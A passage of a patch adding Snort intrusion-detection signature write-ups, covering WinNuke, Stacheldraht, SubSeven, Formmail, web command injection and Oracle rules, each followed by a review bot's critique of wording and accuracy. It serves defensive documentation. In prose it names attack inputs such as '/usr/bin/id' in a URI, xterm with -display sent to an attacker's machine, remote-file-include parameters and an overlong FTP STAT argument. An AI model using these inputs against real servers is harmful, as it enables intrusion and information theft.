+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
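Review bot: the Summary says "may indicate that an exploitation attempt has been attempted"; drop the redundancy. "running ona web server" in Detailed Information should be "running on a web server". The credential-validation paragraph is copied from the generic web-attack template and does not apply to a remote file include through "babInstallPath"; replace it with a sentence on what the rule matches (a URL in that parameter of "start.php"). Additional References is empty; add the advisory or vulnerability database entry for this Ovidentia issue so the Affected Systems line ("All systems running CGI applications using Ovidentia") can be narrowed to the vulnerable versions.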
--- /dev/null
+++ b/doc/signatures/1257.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1257 
+
+--
+Summary:
+This event is generated when an attempt is made to use WinNuke against a
+host.
+
+--
+Impact:
+Serious. Possible Denial of Service (DoS), this can cause a system to 
+crash or lose network connectivity
+
+--
+Detailed Information:
+An attacker can send a malformed data packet to and networked host over 
+TCP and cause a DoS, loss of network connectivity, or a system crash.
+
+--
+Affected Systems:
+	Windows NT Workstation and Server 4.0
+	Windows NT Workstation and Server 3.5.x
+	Windows 3.1x
+	Windows 95
+--
+Attack Scenarios:
+Program is run against a system in an attempt to knock the system off 
+the network. 
+
+--
+Ease of Attack:
+Simple. An attacker runs WinNuke and enters an IP address of a target 
+system.
+
+--
+False Positives:
+None Known.
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Since there is no known fix for several of the affected operating 
+systems, SMB traffic should be blocked at the firewall and all TCP 
+traffic on ports 139/135 should be dropped.
+ 
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+--
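Review bot: "send a malformed data packet to and networked host" should read "to any networked host", and Detailed Information never says what makes the packet malformed, so a reader cannot tell what the rule matches or judge a possible false positive; state the characteristic the rule keys on (the WinNuke out-of-band data sent to the NetBIOS session port). Corrective Action claims "there is no known fix for several of the affected operating systems" while Additional References is empty; either cite the vendor statement that backs this or soften the claim. The port list "139/135" should also say which service each port carries, since the sentence before it only mentions SMB.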
--- /dev/null
+++ b/doc/signatures/1209.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1209
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
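Review bot: nothing in this file identifies what SID 1209 actually matches; Summary, Detailed Information and Attack Scenarios are the generic web-attack template (the same paragraphs appear in 1815.txt), so the document could describe any web rule. Add the URI or content string the rule looks for and the vulnerable product, and fill Additional References accordingly; without that, "None known" under False Positives is unsupported, since a generic pattern in URIs is exactly the kind that fires on legitimate traffic.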
--- /dev/null
+++ b/doc/signatures/1855.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1855
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the a message sent from
+the agent to the handler. This message is used to tell the handler that
+the machine is still alive and able to take requests. The handler will
+then reply with the string "ficken". This traffic differs from the
+traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because the
+packets have an icmp id of 6666 rather than 666 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+ 
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
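Review bot: Corrective Action ("Disconnect power from the machine and perform forensic analysis on the hard drives") discards the volatile evidence that identifies the handler this agent reports to (the running agent process and its open connections); advise isolating the host from the network and capturing process and connection state before powering it off. Typos in Detailed Information: "Stracheldraht" should be "Stacheldraht" (as in the Summary), "The clients connects" should be "The client connects", and "detects the a message" should be "detects a message". Since the text says the tool is "normally found on" Solaris, Affected Systems listing only Sun Solaris reads as stronger than the evidence given.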
--- /dev/null
+++ b/doc/signatures/1815.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1815
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
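Review bot: "running ona web server" in Detailed Information should be "running on a web server". More importantly, the file never says which PHP script or request pattern SID 1815 matches; every section is the generic template also used in 1209.txt, so the Affected Systems line "All systems running PHP applications" and the empty Additional References give an analyst nothing to verify an alert against. Add the specific pattern and product.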
--- /dev/null
+++ b/doc/signatures/1704.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1704
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
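Review bot: the Affected Systems section is empty; either list the affected servers or remove the header, since an empty section reads as an omission. Detailed Information says the attack targets "web, web applications and ftp servers" while Attack Scenarios talks only about browsing outside "the ftp root directory"; say which protocol this rule actually inspects so the two sections agree. There is also a stray extra blank line before the final separator.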
--- /dev/null
+++ b/doc/signatures/884.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+884
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the CGI web application Formmail running on a server.
+
+--
+Impact:
+Several vulnerabilities include server access, information
+disclosure, spam relaying and mail anonymizing.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the perl cgi
+script Formmail. Early versions (1.6 and prior) had several vulnerabilities 
+(Spam engine, ability to run commands under server id and set 
+environment variables) and should be upgraded immediately. Newer 
+versions can still be used by spammers for anonymizing email and
+defeating email relay controls.
+
+--
+Affected Systems:
+	All systems running Formmail
+
+--
+Attack Scenarios:
+Information can be appended to the URL to use your
+mail gateway avoiding SMTP relay controls. HTTP header information can
+be manipulated to avoid access control methods in script. Allows SMTP
+exploits that are normally available only to trusted (local) users such
+as Sendmail % hack.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+Legitimate use of the script can cause alerts. Verify
+packet payload and watch web/mailserver logfiles.
+
+--
+False Negatives:
+If the name of the script has been changed this rule will not generate
+an event.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Binsfield (IDS@Safedge.com)
+
+--
+Additional References:
+
+--
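Review bot: Additional References is empty even though Detailed Information names a specific vulnerable version range ("1.6 and prior") and several distinct issues; add the advisory that establishes that range. In Attack Scenarios, "use your mail gateway" switches to the second person, unlike the rest of the docs, and "Sendmail % hack" is unexplained; a short gloss or a reference is needed for a reader to act on it. The False Negatives note about a renamed script is a good one and could be paired with a False Positives caveat that any form on the site that legitimately posts to the script will fire the rule.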
--- /dev/null
+++ b/doc/signatures/107.txt
@@ -0,0 +1,119 @@
+Rule:
+
+--
+Sid:
+107
+
+--
+Summary:
+Subseven22 is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a 
+compromise of all resources the machine is connected to. This Trojan 
+also has the ability to delete data, steal passwords and disable the 
+machine. Other versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes 
+changes to the system registry, Win.ini and System.ini. When first 
+executed the Trojan replicates itself and in most cases, gives the copy 
+a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+Subseven is an improved version of the Netbus Trojan (see sids 114, 
+115), Subseven DEFCON8 2.1 is an improved version of Subseven that 
+affects Windows 95 and 98 implementations.
+
+The Trojan changes system startup files and registry settings to add the
+Subseven sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	103	subseven 22 (incoming TCP connection)
+	107	subseven DEFCON8 2.1 access (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This 
+event is indicative of an existing infection being activated. Initial 
+compromise can be in the form of a Win32 installation program that may 
+use the extension ".jpg" or ".bmp" when delivered via e-mail for 
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. 
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be 
+attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a 
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in 
+".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ 
+folders that use alphanumeric file names. The name of the replicant may 
+be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running 
+in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Hackfix
+http://www.hackfix.org/subseven/
+
+McAfee
+http://vil.mcafee.com/dispVirus.asp?virus_k=10566
+http://vil.nai.com/vil/content/v_10566.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/backdoor.subseven22.html
+
+F-Secure:
+http://www.f-secure.com/v-descs/subseven.shtml
+
+--
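Review bot: the Summary ("Subseven22 is a Trojan Horse.") contradicts the SID table further down, which maps 107 to "subseven DEFCON8 2.1 access (outgoing TCP connection)" and 103 to subseven 22; the Summary should describe what 107 detects, and the operating system list should be reconciled with the statement that DEFCON8 2.1 affects Windows 95 and 98. In Corrective Action, the order of steps matters: since HKEY_CLASSES_ROOT\exefile\shell\open\command is listed as modified, that key must be restored before the replicant is deleted, otherwise no .exe (including the registry editor) will launch. The registry paths should read "CurrentVersion" without a space. Typos: "exceutable", "Subseven sever".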
--- /dev/null
+++ b/doc/signatures/100000100.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+100000100
+
+-- 
+Summary: 
+This event is generated when a URI of 1,050 bytes ore more is requested from an 
+internal web server.
+
+-- 
+
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This rule is used in conjunction with SID 100000101 to detect buffer overflow 
+attacks against the Adobe Acrobat/Acrobat Reader ActiveX Control, pdf.ocx. This 
+rule should never generate an alert.
+
+--
+Affected Systems:
+Adobe Acrobat 5.0
+Adobe Acrobat 5.0.5
+Adobe Acrobat 6.0
+Adobe Acrobat 6.0.1
+Adobe Acrobat Reader 5.0
+Adobe Acrobat Reader 5.0.5
+Adobe Acrobat Reader 5.1
+Adobe Acrobat Reader 6.0
+Adobe Acrobat Reader 6.0.1
+
+--
+
+Attack Scenarios: 
+A web browser or automated script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as simply typing a long URI into a web browser will suffice.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Upgrade to Adobe Acrobat/Acrobat Reader 6.0.2.
+An alternate workaround is available: disable "Display PDF in browser" under 
+Edit -> Preferences.
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.adobe.com/support/downloads/thankyou.jsp?ftpID=2589&fileID=2433
+
+--
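Review bot: "1,050 bytes ore more" should be "or more". The statement "This rule should never generate an alert" needs the reason spelled out; if the rule only sets a flowbit that SID 100000101 checks, say so, since an analyst who sees it fire will otherwise assume a misconfiguration. Impact "Unknown" is inconsistent with Detailed Information, which names a buffer overflow in the Acrobat ActiveX control; and Ease of Attack ("simply typing a long URI into a web browser") describes how the trigger looks on the wire, but the victim is the browser running the control, so the scenario should say the attacker must get the user to request that URI.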
--- /dev/null
+++ b/doc/signatures/100000595.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000595
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_config.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_config.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
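Review bot: this file is the same text as 100000622.txt with only the script name changed, so it carries the same problems: separators after the Sid value, after the Affected Systems line and after the Contributors list lack the blank line used elsewhere; "exploitation attempt has been attempted" and "running ona web server" in the Summary and Detailed Information; the credential-validation paragraph does not describe a remote file include via "admin_template_path" in "inv_config.php"; and Additional References is empty. If these are generated from one template, fix the template rather than each copy.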
--- /dev/null
+++ b/doc/signatures/1363.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 1363
+
+-- 
+Summary: 
+This event is generated when execution of a common X Window system command is attempted via HTTP.
+
+-- 
+Impact: 
+The attacker may be able to initiate an X session on the web server.
+
+-- 
+Detailed Information: 
+This rule generates an event when an X Windows system command command is used with a parameter to set the display location over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. 
+
+The "display" parameter is used to specify an address for the X server to listen for connections. 
+
+The rule looks for the "display" parameter in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the parameter in the URL indicates that an attacker attempted to trick the web server into executing a system command in non-interactive mode i.e. without a valid shell session. 
+
+This rule may also generate an event if it detects this command in an unencrypted HTTP tunneling connection to the server or a shell connection through an exploit of the web server.
+
+-- 
+Attack Scenarios: 
+An attacker launches an "xterm" as the web server user and points it to his machine via the 'display" parameter.
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of its designated web root or cgi-bin.
+
+This command may also be requested on a command line should the attacker gain access to the machine. 
+
+Non-essential binaries should be removed from a webserver once it is in production.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
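Review bot: "an X Windows system command command is used" has a doubled word and should say "X Window System"; in Attack Scenarios the quotes around 'display" are mismatched. The second paragraph of Corrective Action ("This command may also be requested on a command line should the attacker gain access to the machine") is an attack scenario copied from 1333.txt, not a corrective action; move or drop it. The file also lacks an Affected Systems section, and the detection description should name the command the rule keys on ("xterm" with "-display", if that is the content match) rather than only "the display parameter".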
--- /dev/null
+++ b/doc/signatures/1333.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1333
+
+--
+Summary:
+Attempted id command access via web
+
+--
+Impact:
+Attempt to gain information on users and groups that exist on the host
+using the id command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the users on a webserver.
+id is a UNIX command that will return information about the system's
+users and groups. This information is valuable to an attacker who can
+use it to plan further attacks based on the users possible login
+information or be more effective in targeting specific users and groups
+who possess elevated privileges . The id command will return information
+on the user, the groups the user belings to and the users' "gid" and "uid".
+
+The rule looks for the "id" command in the client to web server network
+traffic and does not indicate whether the command was actually
+successful in showing the user information. The presence of the "id"
+command web traffic indicates that an attacker attempted to trick the
+web server into executing system in non-interactive mode i.e. without a
+valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/usr/bin/id' in the URI which can then return sensitive information on
+groups and users present on the host. 
+
+2. This command may also be requested on a command line should the
+attacker gain access to the machine.
+
+3. An attacker uses a "id" command via a web server connection to test
+what username the web server runs under. He then looks for all the files
+writable by this user and find a web server configuration file with
+wrong permissions.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1332
+
+man id
+
+--
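Review bot: Attack Scenario 2 ("requested on a command line should the attacker gain access to the machine") cannot be seen by a rule that inspects client-to-web-server HTTP traffic, so it does not belong here. In Detailed Information, "belings" should be "belongs", "executing system in non-interactive mode" is missing "commands", and in Corrective Action "it's designated web root" should be "its". The Summary ("Attempted id command access via web") is a fragment where the other docs use a full sentence, and an Affected Systems section is missing.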
--- /dev/null
+++ b/doc/signatures/1675.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1675
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
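Review bot: Attack Scenarios ("Simple. These are Oracle database commands.") is an Ease of Attack answer, not a scenario, and the Summary never says which command SID 1675 matches, so the reader cannot tell why this particular command "may result in a serious compromise". "This connection can either be a legitimate telnet connection" is wrong for an Oracle listener, whose clients speak the Oracle network protocol; say "a legitimate client connection". The $ORACLE_PORTS guidance appears twice (Detailed Information and False Negatives); keep one copy, and add the missing full stop after "from sources external to the protected network".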
--- /dev/null
+++ b/doc/signatures/2197.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid:
+2197
+
+--
+Summary:
+This event is generated when an attempt is made to access cvsview2.cgi on an internal web server. This may indicate an attempt to exploit an information disclosure vulnerability in Mozilla Bonsai 1.3.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+Mozilla Bonsai, a CVS query tool, contains an information disclosure vulnerability in cvsview2.cgi. An attacker can discover the location of the Mozilla Bonsai application by sending a malformed request to the application, which produces an error. The error message shows the full path of the cvsview2.cgi file, providing the attacker with information about the server directory structure.
+
+--
+Affected Systems:
+Any system running Mozilla Bonsai 1.3.
+
+--
+Attack Scenarios:
+An attacker sends an erroneous request to cvsview2.cgi on the Bonsai server. The error message returns the full path of the script, allowing the attacker to discover more information about the server directory structure for possible use in later attacks.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses cvsview2.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a newer build of Mozilla Bonsai 1.3.
+
+If you are running Mozilla Bonsai on Debian 3.0, Debian has provided patches at http://security.debian.org/pool/updates/main/b/bonsai/.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/5517
+
+--
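Review bot: "Upgrade to a newer build of Mozilla Bonsai 1.3." under Corrective Action does not say which build closes the disclosure; if the fixed build is known it should be named, otherwise point the reader at the Bugtraq entry already listed under Additional References. The "Rule:  " and "-- " lines also carry trailing whitespace.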
--- /dev/null
+++ b/doc/signatures/2991.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2991
+
+--
+Summary:
+This event is generated when an attempt is made to bind to the winreg
+service.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to bind to the RPC
+service for winreg.
+
+--
+Affected Systems:
+	Windows systems
+
+--
+Attack Scenarios:
+An attacker may attempt to bind to the service to manipulate host
+settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+--
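Review bot: Impact reads "Unknown." while Attack Scenarios states that an attacker binds to winreg "to manipulate host settings"; the two sections should agree, e.g. Impact could state that remote registry access may allow host configuration to be read or changed. The first Corrective Action line also has trailing whitespace.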
--- /dev/null
+++ b/doc/signatures/1379.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1379
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with IPSWITCH WS_FTP server for 
+Windows hosts.
+
+--
+Impact:
+Remote administrator access.  A successful attack can allow remote 
+execution of arbitrary commands with privileges of administrator.
+
+--
+Detailed Information:
+A buffer overflow exists in WS_FTP server that may permit the execution 
+of arbitrary commands with the privileges of administrator.  The exploit
+can be generated by FTP client sending a STAT command accompanied by an 
+argument greater than 479 bytes long.  This exploit requires login 
+access to the FTP server.
+
+--
+Affected Systems:
+Hosts running WS_FTP server 2.0.3.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WS_FTP server and supply an overly
+long file argument to cause a buffer overflow, allowing execution of 
+arbitrary commands with the privileges of administrator.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Security Focus:
+http://www.securityfocus.com/advisories/3641
+
+--
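Review bot: Detailed Information says the overflow is triggered by "a STAT command accompanied by an argument greater than 479 bytes long", but Attack Scenarios only mentions "an overly long file argument" without naming the command; the scenario should name STAT so the two sections match. "can be generated by FTP client" also needs an article ("by an FTP client"), and the Brian Caswell contributor line has trailing whitespace.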
--- /dev/null
+++ b/doc/signatures/3175.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3175
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
